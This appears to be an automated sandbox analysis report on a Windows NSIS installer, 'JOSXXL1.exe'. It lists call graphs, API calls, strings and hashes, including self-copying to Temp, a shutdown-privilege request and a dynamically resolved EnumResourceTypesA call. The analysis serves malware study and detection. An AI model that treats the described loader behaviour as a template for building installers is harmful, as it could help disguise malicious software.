4761 405b64 CharNextW 4751->4761 4754 403bc9 4752->4754 4755 403b4a RegisterClassW 4752->4755 4753->4752 4759 40140b 2 API calls 4754->4759 4757 403b80 SystemParametersInfoW CreateWindowExW 4755->4757 4758 403bd3 4755->4758 4762 403b00 4756->4762 4763 403ada lstrcmpiW 4756->4763 4757->4754 4758->4676 4760 403bcf 4759->4760 4760->4758 4767 403ca2 19 API calls 4760->4767 4765 403ac9 4761->4765 4764 405b37 3 API calls 4762->4764 4763->4762 4766 403aea GetFileAttributesW 4763->4766 4768 403b06 4764->4768 4765->4756 4769 403af6 4766->4769 4771 403be0 4767->4771 4853 406183 lstrcpynW 4768->4853 4769->4762 4770 405b83 2 API calls 4769->4770 4770->4762 4773 403bec ShowWindow 4771->4773 4774 403c6f 4771->4774 4776 4064ed 3 API calls 4773->4776 4775 4053b5 5 API calls 4774->4775 4777 403c75 4775->4777 4780 403c04 4776->4780 4778 403c91 4777->4778 4781 403c79 4777->4781 4782 40140b 2 API calls 4778->4782 4779 403c12 GetClassInfoW 4784 403c26 GetClassInfoW RegisterClassW 4779->4784 4785 403c3c DialogBoxParamW 4779->4785 4780->4779 4783 4064ed 3 API calls 4780->4783 4781->4758 4786 40140b 2 API calls 4781->4786 4782->4758 4783->4779 4784->4785 4787 40140b 2 API calls 4785->4787 4786->4758 4787->4758 4788->4625 4855 406183 lstrcpynW 4789->4855 4791 405c50 4856 405be2 CharNextW CharNextW 4791->4856 4794 4036d9 4794->4676 4803 406183 lstrcpynW 4794->4803 4795 406417 5 API calls 4801 405c66 4795->4801 4796 405c97 lstrlenW 4797 405ca2 4796->4797 4796->4801 4799 405b37 3 API calls 4797->4799 4798 4064c6 2 API calls 4798->4801 4800 405ca7 GetFileAttributesW 4799->4800 4800->4794 4801->4794 4801->4796 4801->4798 4802 405b83 2 API calls 4801->4802 4802->4796 4803->4657 4804->4626 4806 4038f5 4805->4806 4807 4038eb CloseHandle 4805->4807 4808 403909 4806->4808 4809 4038ff CloseHandle 4806->4809 4807->4806 4862 403937 4808->4862 4809->4808 4815 406559 5 API calls 4814->4815 4816 403739 lstrcatW 4815->4816 4816->4651 4816->4652 4818 405802 GetLastError 4817->4818 4819 40377b 4817->4819 4818->4819 4820 405811 SetFileSecurityW 4818->4820 4819->4665 4820->4819 4821 405827 GetLastError 4820->4821 4821->4819 4823 405842 GetLastError 4822->4823 4824 40583e 4822->4824 4823->4824 4824->4665 4825->4667 4826->4677 4828 406038 4827->4828 4830 406045 4827->4830 4916 405eb2 lstrcpyW 4828->4916 4830->4677 4832 4058a2 4831->4832 4833 405896 CloseHandle 4831->4833 4832->4677 4833->4832 4834->4704 4835->4706 4837 405b91 4836->4837 4838 402ead 4837->4838 4839 405b97 CharPrevW 4837->4839 4840 406183 lstrcpynW 4838->4840 4839->4837 4839->4838 4840->4710 4841->4728 4842->4720 4844 403cb6 4843->4844 4854 4060ca wsprintfW 4844->4854 4846 403d27 4847 4061a5 18 API calls 4846->4847 4848 403d33 SetWindowTextW 4847->4848 4849 403a57 4848->4849 4850 403d4f 4848->4850 4849->4745 4850->4849 4851 4061a5 18 API calls 4850->4851 4851->4850 4852->4741 4853->4747 4854->4846 4855->4791 4857 405bff 4856->4857 4860 405c11 4856->4860 4859 405c0c CharNextW 4857->4859 4857->4860 4858 405c35 4858->4794 4858->4795 4859->4858 4860->4858 4861 405b64 CharNextW 4860->4861 4861->4860 4863 403945 4862->4863 4864 40390e 4863->4864 4865 40394a FreeLibrary GlobalFree 4863->4865 4866 405974 4864->4866 4865->4864 4865->4865 4867 405c3f 18 API calls 4866->4867 4868 405994 4867->4868 4869 4059b3 4868->4869 4870 40599c DeleteFileW 4868->4870 4872 405ade 4869->4872 4906 406183 lstrcpynW 4869->4906 4871 40370c OleUninitialize 4870->4871 4871->4633 4871->4634 4872->4871 4877 4064c6 2 API calls 4872->4877 4874 4059d9 4875 4059ec 4874->4875 4876 4059df lstrcatW 4874->4876 4879 405b83 2 API calls 4875->4879 4878 4059f2 4876->4878 4882 405af8 4877->4882 4880 405a02 lstrcatW 4878->4880 4881 4059f8 4878->4881 4879->4878 4883 405a0d lstrlenW FindFirstFileW 4880->4883 4881->4880 4881->4883 4882->4871 4884 405afc 4882->4884 4885 405ad3 4883->4885 4904 405a2f 4883->4904 4886 405b37 3 API calls 4884->4886 4885->4872 4887 405b02 4886->4887 4889 40592c 5 API calls 4887->4889 4888 405ab6 FindNextFileW 4892 405acc FindClose 4888->4892 4888->4904 4891 405b0e 4889->4891 4893 405b12 4891->4893 4894 405b28 4891->4894 4892->4885 4893->4871 4897 4052e2 25 API calls 4893->4897 4895 4052e2 25 API calls 4894->4895 4895->4871 4899 405b1f 4897->4899 4898 405974 62 API calls 4898->4904 4901 406024 38 API calls 4899->4901 4900 4052e2 25 API calls 4900->4888 4903 405b26 4901->4903 4902 4052e2 25 API calls 4902->4904 4903->4871 4904->4888 4904->4898 4904->4900 4904->4902 4905 406024 38 API calls 4904->4905 4907 406183 lstrcpynW 4904->4907 4908 40592c 4904->4908 4905->4904 4906->4874 4907->4904 4909 405d33 2 API calls 4908->4909 4910 405938 4909->4910 4911 405947 RemoveDirectoryW 4910->4911 4912 40594f DeleteFileW 4910->4912 4914 405959 4910->4914 4913 405955 4911->4913 4912->4913 4913->4914 4915 405965 SetFileAttributesW 4913->4915 4914->4904 4915->4914 4917 405f00 GetShortPathNameW 4916->4917 4918 405eda 4916->4918 4919 405f15 4917->4919 4920 40601f 4917->4920 4943 405d58 GetFileAttributesW CreateFileW 4918->4943 4919->4920 4922 405f1d wsprintfA 4919->4922 4920->4830 4924 4061a5 18 API calls 4922->4924 4923 405ee4 CloseHandle GetShortPathNameW 4923->4920 4925 405ef8 4923->4925 4926 405f45 4924->4926 4925->4917 4925->4920 4944 405d58 GetFileAttributesW CreateFileW 4926->4944 4928 405f52 4928->4920 4929 405f61 GetFileSize GlobalAlloc 4928->4929 4930 405f83 4929->4930 4931 406018 CloseHandle 4929->4931 4932 405ddb ReadFile 4930->4932 4931->4920 4933 405f8b 4932->4933 4933->4931 4945 405cbd lstrlenA 4933->4945 4936 405fa2 lstrcpyA 4939 405fc4 4936->4939 4937 405fb6 4938 405cbd 4 API calls 4937->4938 4938->4939 4940 405ffb SetFilePointer 4939->4940 4941 405e0a WriteFile 4940->4941 4942 406011 GlobalFree 4941->4942 4942->4931 4943->4923 4944->4928 4946 405cfe lstrlenA 4945->4946 4947 405d06 4946->4947 4948 405cd7 lstrcmpiA 4946->4948 4947->4936 4947->4937 4948->4947 4949 405cf5 CharNextA 4948->4949 4949->4946 4950 401b37 4951 401b44 4950->4951 4952 401b88 4950->4952 4955 401bcd 4951->4955 4960 401b5b 4951->4960 4953 401bb2 GlobalAlloc 4952->4953 4954 401b8d 4952->4954 4956 4061a5 18 API calls 4953->4956 4964 402288 4954->4964 4971 406183 lstrcpynW 4954->4971 4957 4061a5 18 API calls 4955->4957 4955->4964 4956->4955 4959 402282 4957->4959 4965 4058c8 MessageBoxIndirectW 4959->4965 4969 406183 lstrcpynW 4960->4969 4962 401b9f GlobalFree 4962->4964 4963 401b6a 4970 406183 lstrcpynW 4963->4970 4965->4964 4967 401b79 4972 406183 lstrcpynW 4967->4972 4969->4963 4970->4967 4971->4962 4972->4964 5796 402537 5797 402562 5796->5797 5798 40254b 5796->5798 5799 402596 5797->5799 5800 402567 5797->5800 5801 402ba2 18 API calls 5798->5801 5803 402bbf 18 API calls 5799->5803 5802 402bbf 18 API calls 5800->5802 5807 402552 5801->5807 5804 40256e WideCharToMultiByte lstrlenA 5802->5804 5805 40259d lstrlenW 5803->5805 5804->5807 5805->5807 5806 4025e0 5807->5806 5809 405e39 5 API calls 5807->5809 5810 4025ca 5807->5810 5808 405e0a WriteFile 5808->5806 5809->5810 5810->5806 5810->5808 5811 404a38 5812 404a64 5811->5812 5813 404a48 5811->5813 5815 404a97 5812->5815 5816 404a6a SHGetPathFromIDListW 5812->5816 5822 4058ac GetDlgItemTextW 5813->5822 5818 404a81 SendMessageW 5816->5818 5819 404a7a 5816->5819 5817 404a55 SendMessageW 5817->5812 5818->5815 5821 40140b 2 API calls 5819->5821 5821->5818 5822->5817 5823 4014b8 5824 4014be 5823->5824 5825 401389 2 API calls 5824->5825 5826 4014c6 5825->5826 4987 4015b9 4988 402bbf 18 API calls 4987->4988 4989 4015c0 4988->4989 4990 405be2 4 API calls 4989->4990 5000 4015c9 4990->5000 4991 401629 4993 40165b 4991->4993 4994 40162e 4991->4994 4992 405b64 CharNextW 4992->5000 4996 401423 25 API calls 4993->4996 4995 401423 25 API calls 4994->4995 4997 401635 4995->4997 5004 401653 4996->5004 5006 406183 lstrcpynW 4997->5006 4998 40582e 2 API calls 4998->5000 5000->4991 5000->4992 5000->4998 5001 40584b 5 API calls 5000->5001 5003 40160f GetFileAttributesW 5000->5003 5005 4057b1 4 API calls 5000->5005 5001->5000 5002 401642 SetCurrentDirectoryW 5002->5004 5003->5000 5005->5000 5006->5002 5834 40293b 5835 402ba2 18 API calls 5834->5835 5836 402941 5835->5836 5837 402964 5836->5837 5838 40297d 5836->5838 5845 40281e 5836->5845 5841 402969 5837->5841 5842 40297a 5837->5842 5839 402993 5838->5839 5840 402987 5838->5840 5844 4061a5 18 API calls 5839->5844 5843 402ba2 18 API calls 5840->5843 5848 406183 lstrcpynW 5841->5848 5849 4060ca wsprintfW 5842->5849 5843->5845 5844->5845 5848->5845 5849->5845 5850 10002a7f 5851 10002a97 5850->5851 5852 1000158f 2 API calls 5851->5852 5853 10002ab2 5852->5853

                                                                                                        Executed Functions

                                                                                                        Function 004033B6 Relevance: 93.2, APIs: 32, Strings: 21, Instructions: 401stringfilecomCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 4033b6-4033e8 SetErrorMode GetVersion 1 4033ea-4033f2 call 406559 0->1 2 4033fb-40348e call 4064ed * 3 call 406559 * 2 #17 OleInitialize SHGetFileInfoW call 406183 GetCommandLineW call 406183 GetModuleHandleW 0->2 1->2 8 4033f4 1->8 20 403490-403497 2->20 21 403498-4034b2 call 405b64 CharNextW 2->21 8->2 20->21 24 4034b8-4034be 21->24 25 4035ca-4035e4 GetTempPathW call 403385 21->25 26 4034c0-4034c5 24->26 27 4034c7-4034cd 24->27 34 4035e6-403604 GetWindowsDirectoryW lstrcatW call 403385 25->34 35 40363c-403656 DeleteFileW call 402e41 25->35 26->26 26->27 29 4034d4-4034d8 27->29 30 4034cf-4034d3 27->30 32 403596-4035a3 call 405b64 29->32 33 4034de-4034e4 29->33 30->29 50 4035a5-4035a6 32->50 51 4035a7-4035ad 32->51 38 4034e6-4034ed 33->38 39 4034fe-403537 33->39 34->35 48 403606-403636 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403385 34->48 52 403707-403718 call 4038da OleUninitialize 35->52 53 40365c-403662 35->53 44 4034f4 38->44 45 4034ef-4034f2 38->45 46 403554-40358e 39->46 47 403539-40353e 39->47 44->39 45->39 45->44 46->32 49 403590-403594 46->49 47->46 54 403540-403548 47->54 48->35 48->52 49->32 56 4035b5-4035c3 call 406183 49->56 50->51 51->24 57 4035b3 51->57 71 40383e-403844 52->71 72 40371e-40372e call 4058c8 ExitProcess 52->72 58 4036f7-4036fe call 4039cc 53->58 59 403668-403673 call 405b64 53->59 61 40354a-40354d 54->61 62 40354f 54->62 64 4035c8 56->64 57->64 70 403703 58->70 76 4036c1-4036cb 59->76 77 403675-4036aa 59->77 61->46 61->62 62->46 64->25 70->52 74 4038c2-4038ca 71->74 75 403846-40385c GetCurrentProcess OpenProcessToken 71->75 78 4038d0-4038d4 ExitProcess 74->78 79 4038cc 74->79 83 403892-4038a0 call 406559 75->83 84 40385e-40388c LookupPrivilegeValueW AdjustTokenPrivileges 75->84 81 403734-403748 call 40584b lstrcatW 76->81 82 4036cd-4036db call 405c3f 76->82 85 4036ac-4036b0 77->85 79->78 96 403755-40376f lstrcatW lstrcmpiW 81->96 97 40374a-403750 lstrcatW 81->97 82->52 95 4036dd-4036f3 call 406183 * 2 82->95 98 4038a2-4038ac 83->98 99 4038ae-4038b9 ExitWindowsEx 83->99 84->83 89 4036b2-4036b7 85->89 90 4036b9-4036bd 85->90 89->90 94 4036bf 89->94 90->85 90->94 94->76 95->58 96->52 101 403771-403774 96->101 97->96 98->99 102 4038bb-4038bd call 40140b 98->102 99->74 99->102 104 403776-40377b call 4057b1 101->104 105 40377d call 40582e 101->105 102->74 113 403782-403790 SetCurrentDirectoryW 104->113 105->113 114 403792-403798 call 406183 113->114 115 40379d-4037c6 call 406183 113->115 114->115 119 4037cb-4037e7 call 4061a5 DeleteFileW 115->119 122 403828-403830 119->122 123 4037e9-4037f9 CopyFileW 119->123 122->119 124 403832-403839 call 406024 122->124 123->122 125 4037fb-40381b call 406024 call 4061a5 call 405863 123->125 124->52 125->122 134 40381d-403824 CloseHandle 125->134 134->122
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE ref: 004033D8
                                                                                                        • GetVersion.KERNEL32 ref: 004033DE
                                                                                                        • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040342E
                                                                                                        • OleInitialize.OLE32(00000000), ref: 00403435
                                                                                                        • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403451
                                                                                                        • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 00403466
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\JOSXXL1.exe",00000000), ref: 00403479
                                                                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\JOSXXL1.exe",00000020), ref: 004034A0
                                                                                                          • Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
                                                                                                          • Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586
                                                                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004035DB
                                                                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004035EC
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035F8
                                                                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040360C
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403614
                                                                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403625
                                                                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040362D
                                                                                                        • DeleteFileW.KERNELBASE(1033), ref: 00403641
                                                                                                          • Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190
                                                                                                        • OleUninitialize.OLE32(?), ref: 0040370C
                                                                                                        • ExitProcess.KERNEL32 ref: 0040372E
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\JOSXXL1.exe",00000000,?), ref: 00403741
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\JOSXXL1.exe",00000000,?), ref: 00403750
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\JOSXXL1.exe",00000000,?), ref: 0040375B
                                                                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\JOSXXL1.exe",00000000,?), ref: 00403767
                                                                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403783
                                                                                                        • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 004037DD
                                                                                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\JOSXXL1.exe,00420F08,00000001), ref: 004037F1
                                                                                                        • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 0040381E
                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040384D
                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403854
                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403869
                                                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 0040388C
                                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 004038B1
                                                                                                        • ExitProcess.KERNEL32 ref: 004038D4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                        • String ID: "C:\Users\user\Desktop\JOSXXL1.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\indvandrings\attraavrdig$C:\Users\user\AppData\Local\indvandrings\attraavrdig$C:\Users\user\Desktop$C:\Users\user\Desktop\JOSXXL1.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$kernel32::EnumResourceTypesA(i 0,i r8,i 0)$~nsu
                                                                                                        • API String ID: 3586999533-2604846293
                                                                                                        • Opcode ID: 37fd72db2f3c779e54c66a831dce751320d167363bccd50d4a6240ace931b804
                                                                                                        • Instruction ID: 382b60f40ca78a79eaa77c6fd6579f97e3273799caf5780a05f3f86dc88dff68
                                                                                                        • Opcode Fuzzy Hash: 37fd72db2f3c779e54c66a831dce751320d167363bccd50d4a6240ace931b804
                                                                                                        • Instruction Fuzzy Hash: 1DD11771200300BBD7207F659D09A2B3EADEB4070AF15843FF885B62D2DB7D9956876E
                                                                                                        Function 00405421 Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 135 405421-40543c 136 405442-405509 GetDlgItem * 3 call 40427c call 404b7f GetClientRect GetSystemMetrics SendMessageW * 2 135->136 137 4055cb-4055d2 135->137 155 405527-40552a 136->155 156 40550b-405525 SendMessageW * 2 136->156 138 4055d4-4055f6 GetDlgItem CreateThread CloseHandle 137->138 139 4055fc-405609 137->139 138->139 141 405627-405631 139->141 142 40560b-405611 139->142 147 405633-405639 141->147 148 405687-40568b 141->148 145 405613-405622 ShowWindow * 2 call 40427c 142->145 146 40564c-405655 call 4042ae 142->146 145->141 159 40565a-40565e 146->159 152 405661-405671 ShowWindow 147->152 153 40563b-405647 call 404220 147->153 148->146 150 40568d-405693 148->150 150->146 157 405695-4056a8 SendMessageW 150->157 160 405681-405682 call 404220 152->160 161 405673-40567c call 4052e2 152->161 153->146 163 40553a-405551 call 404247 155->163 164 40552c-405538 SendMessageW 155->164 156->155 165 4057aa-4057ac 157->165 166 4056ae-4056d9 CreatePopupMenu call 4061a5 AppendMenuW 157->166 160->148 161->160 174 405553-405567 ShowWindow 163->174 175 405587-4055a8 GetDlgItem SendMessageW 163->175 164->163 165->159 172 4056db-4056eb GetWindowRect 166->172 173 4056ee-405703 TrackPopupMenu 166->173 172->173 173->165 176 405709-405720 173->176 177 405576 174->177 178 405569-405574 ShowWindow 174->178 175->165 179 4055ae-4055c6 SendMessageW * 2 175->179 180 405725-405740 SendMessageW 176->180 181 40557c-405582 call 40427c 177->181 178->181 179->165 180->180 182 405742-405765 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 180->182 181->175 184 405767-40578e SendMessageW 182->184 184->184 185 405790-4057a4 GlobalUnlock SetClipboardData CloseClipboard 184->185 185->165
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040547F
                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040548E
                                                                                                        • GetClientRect.USER32(?,?), ref: 004054CB
                                                                                                        • GetSystemMetrics.USER32(00000002), ref: 004054D2
                                                                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F3
                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405504
                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405517
                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405525
                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405538
                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555A
                                                                                                        • ShowWindow.USER32(?,00000008), ref: 0040556E
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040558F
                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559F
                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B8
                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C4
                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040549D
                                                                                                          • Part of subcall function 0040427C: SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004055E1
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000053B5,00000000), ref: 004055EF
                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004055F6
                                                                                                        • ShowWindow.USER32(00000000), ref: 0040561A
                                                                                                        • ShowWindow.USER32(?,00000008), ref: 0040561F
                                                                                                        • ShowWindow.USER32(00000008), ref: 00405669
                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040569D
                                                                                                        • CreatePopupMenu.USER32 ref: 004056AE
                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C2
                                                                                                        • GetWindowRect.USER32(?,?), ref: 004056E2
                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FB
                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405733
                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405743
                                                                                                        • EmptyClipboard.USER32 ref: 00405749
                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405755
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0040575F
                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405793
                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 0040579E
                                                                                                        • CloseClipboard.USER32 ref: 004057A4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                        • String ID: H7B$\d${
                                                                                                        • API String ID: 590372296-124952274
                                                                                                        • Opcode ID: b289c1c8cef76fdb5c73aa669ad90c431715ad63f7106bdf0767040ca558229c
                                                                                                        • Instruction ID: 2c7cb92300b087b9ae130e103e133312d6144c84674811722de124f1f1f34f09
                                                                                                        • Opcode Fuzzy Hash: b289c1c8cef76fdb5c73aa669ad90c431715ad63f7106bdf0767040ca558229c
                                                                                                        • Instruction Fuzzy Hash: 16B13770900608FFDF119F60DD899AE7B79FB08354F40847AFA45A62A0CB758E52DF68
                                                                                                        Function 004061A5 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 434 4061a5-4061b0 435 4061b2-4061c1 434->435 436 4061c3-4061d9 434->436 435->436 437 4063f1-4063f7 436->437 438 4061df-4061ec 436->438 440 4063fd-406408 437->440 441 4061fe-40620b 437->441 438->437 439 4061f2-4061f9 438->439 439->437 442 406413-406414 440->442 443 40640a-40640e call 406183 440->443 441->440 444 406211-40621d 441->444 443->442 446 406223-40625f 444->446 447 4063de 444->447 448 406265-406270 GetVersion 446->448 449 40637f-406383 446->449 450 4063e0-4063ea 447->450 451 4063ec-4063ef 447->451 452 406272-406276 448->452 453 40628a 448->453 454 406385-406389 449->454 455 4063b8-4063bc 449->455 450->437 451->437 452->453 461 406278-40627c 452->461 458 406291-406298 453->458 456 406399-4063a6 call 406183 454->456 457 40638b-406397 call 4060ca 454->457 459 4063cb-4063dc lstrlenW 455->459 460 4063be-4063c6 call 4061a5 455->460 472 4063ab-4063b4 456->472 457->472 463 40629a-40629c 458->463 464 40629d-40629f 458->464 459->437 460->459 461->453 467 40627e-406282 461->467 463->464 470 4062a1-4062c7 call 406050 464->470 471 4062db-4062de 464->471 467->453 468 406284-406288 467->468 468->458 482 406366-40636a 470->482 483 4062cd-4062d6 call 4061a5 470->483 475 4062e0-4062ec GetSystemDirectoryW 471->475 476 4062ee-4062f1 471->476 472->459 474 4063b6 472->474 478 406377-40637d call 406417 474->478 479 406360-406364 475->479 480 4062f3-406301 GetWindowsDirectoryW 476->480 481 40635c-40635e 476->481 478->459 479->478 479->482 480->481 481->479 484 406303-40630d 481->484 482->478 489 40636c-406372 lstrcatW 482->489 483->479 486 406327-40633d SHGetSpecialFolderLocation 484->486 487 40630f-406312 484->487 492 406358 486->492 493 40633f-406356 SHGetPathFromIDListW CoTaskMemFree 486->493 487->486 491 406314-40631b 487->491 489->478 495 406323-406325 491->495 492->481 493->479 493->492 495->479 495->486
                                                                                                        APIs
